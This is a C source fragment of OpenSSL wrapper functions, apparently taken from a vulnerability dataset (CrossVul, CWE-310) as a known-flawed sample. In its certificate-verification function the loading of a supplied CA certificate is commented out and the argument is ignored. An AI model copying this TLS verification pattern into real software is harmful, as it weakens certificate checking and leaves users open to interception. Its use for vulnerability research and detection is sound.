num = SSL_write (ssl, buf, len);
switch (SSL_get_error (ssl, num))
{
case SSL_ERROR_SSL: /* setup errno! */
/* ??? */
__SSL_fill_err_buf ("SSL_write");
fprintf (stderr, "%s\n", err_buf);
break;
case SSL_ERROR_SYSCALL:
/* ??? */
perror ("SSL_write/write");
break;
case SSL_ERROR_ZERO_RETURN:
/* fprintf(stderr, "SSL closed on write\n"); */
break;
}
return (num);
}
int
_SSL_recv (SSL * ssl, char *buf, int len)
{
int num;
num = SSL_read (ssl, buf, len);
switch (SSL_get_error (ssl, num))
{
case SSL_ERROR_SSL:
/* ??? */
__SSL_fill_err_buf ("SSL_read");
fprintf (stderr, "%s\n", err_buf);
break;
case SSL_ERROR_SYSCALL:
/* ??? */
if (!would_block ())
perror ("SSL_read/read");
break;
case SSL_ERROR_ZERO_RETURN:
/* fprintf(stdeerr, "SSL closed on read\n"); */
break;
}
return (num);
}
SSL *
_SSL_socket (SSL_CTX *ctx, int sd)
{
SSL *ssl;
if (!(ssl = SSL_new (ctx)))
/* FATAL */
__SSL_critical_error ("SSL_new");
SSL_set_fd (ssl, sd);
if (ctx->method == SSLv23_client_method())
SSL_set_connect_state (ssl);
else
SSL_set_accept_state(ssl);
return (ssl);
}
char *
_SSL_set_verify (SSL_CTX *ctx, void *verify_callback, char *cacert)
{
if (!SSL_CTX_set_default_verify_paths (ctx))
{
__SSL_fill_err_buf ("SSL_CTX_set_default_verify_paths");
return (err_buf);
}
/*
if (cacert)
{
if (!SSL_CTX_load_verify_locations (ctx, cacert, NULL))
{
__SSL_fill_err_buf ("SSL_CTX_load_verify_locations");
return (err_buf);
}
}
*/
SSL_CTX_set_verify (ctx, SSL_VERIFY_PEER, verify_callback);
return (NULL);
}
void
_SSL_close (SSL * ssl)
{
SSL_set_shutdown (ssl, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
SSL_free (ssl);
ERR_remove_state (0); /* free state buffer */
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_5867_1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.